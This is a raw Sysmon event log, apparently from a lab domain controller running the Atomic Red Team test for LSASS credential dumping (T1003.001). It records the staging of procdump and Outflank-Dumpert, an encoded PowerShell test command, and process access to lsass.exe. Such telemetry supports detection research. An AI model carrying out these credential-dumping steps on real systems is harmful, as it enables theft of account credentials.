15:52:50.045{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7CD2-5FA1-D900-000000008801}1556C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004357Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:50.030{D28789B6-7CCC-5FA1-C800-000000008801}31001104C:\Windows\system32\conhost.exe{D28789B6-7CD2-5FA1-D900-000000008801}1556C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004356Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:50.030{D28789B6-7CCD-5FA1-CF00-000000008801}35644496C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CD2-5FA1-D900-000000008801}1556C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3ed3|UNKNOWN(00007FF8DCAD8A03) 10341000x80000000000000004355Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:50.030{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004354Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:50.030{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004353Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:50.030{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004352Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:50.030{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004351Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:50.030{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004350Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:50.030{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004349Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:50.030{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004348Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:50.030{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004347Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:50.030{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004346Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:50.030{D28789B6-7C62-5FA1-0500-000000008801}6442444C:\Windows\system32\csrss.exe{D28789B6-7CD2-5FA1-D900-000000008801}1556C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004345Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:50.030{D28789B6-7CCD-5FA1-CF00-000000008801}35644496C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CD2-5FA1-D900-000000008801}1556C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e37b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e362c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31265e58(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311dc214(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31c95407(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311a4a0c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31202edb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e63d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311d8356(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+312114e6(wow64) 154100x80000000000000004344Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:50.030{D28789B6-7CD2-5FA1-D900-000000008801}1556C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if (Test-Path C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{D28789B6-7CCC-5FA1-4F36-080000000000}0x8364f0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{D28789B6-7CCD-5FA1-CF00-000000008801}3564C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAxACIAIAAtAEcAZQB0AFAAcgBlAHIAZQBxAHMA 11241100x80000000000000004343Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localEXE2020-11-03 15:52:49.998{D28789B6-7CD0-5FA1-D800-000000008801}2872C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe2020-11-03 15:52:49.998 11241100x80000000000000004400Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localEXE2020-11-03 15:52:51.188{D28789B6-7CD2-5FA1-DB00-000000008801}2764C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\atomics\T1003.001\bin\Outflank-Dumpert.exe2020-11-03 15:52:51.188 22542200x80000000000000004399Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:48.730{D28789B6-7CD0-5FA1-D800-000000008801}2872download.sysinternals.com0type: 5 az155186.vo.msecnd.net;type: 5 cs22.wpc.v0cdn.net;::ffff:152.199.19.160;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x80000000000000004454Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:52.502{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7CD4-5FA1-DE00-000000008801}3648C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004453Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:52.502{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7CD4-5FA1-DE00-000000008801}3648C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000004452Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:52.471{D28789B6-7CD4-5FA1-DE00-000000008801}3648C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_wbeaybos.q00.ps12020-11-03 15:52:52.471 10341000x80000000000000004451Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:52.455{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7CD4-5FA1-DE00-000000008801}3648C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004450Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:52.440{D28789B6-7CCC-5FA1-C800-000000008801}31001104C:\Windows\system32\conhost.exe{D28789B6-7CD4-5FA1-DE00-000000008801}3648C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004449Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:52.440{D28789B6-7CCD-5FA1-CF00-000000008801}35644496C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CD4-5FA1-DE00-000000008801}3648C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3ed3|UNKNOWN(00007FF8DCAD8A03) 10341000x80000000000000004448Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:52.440{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004447Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 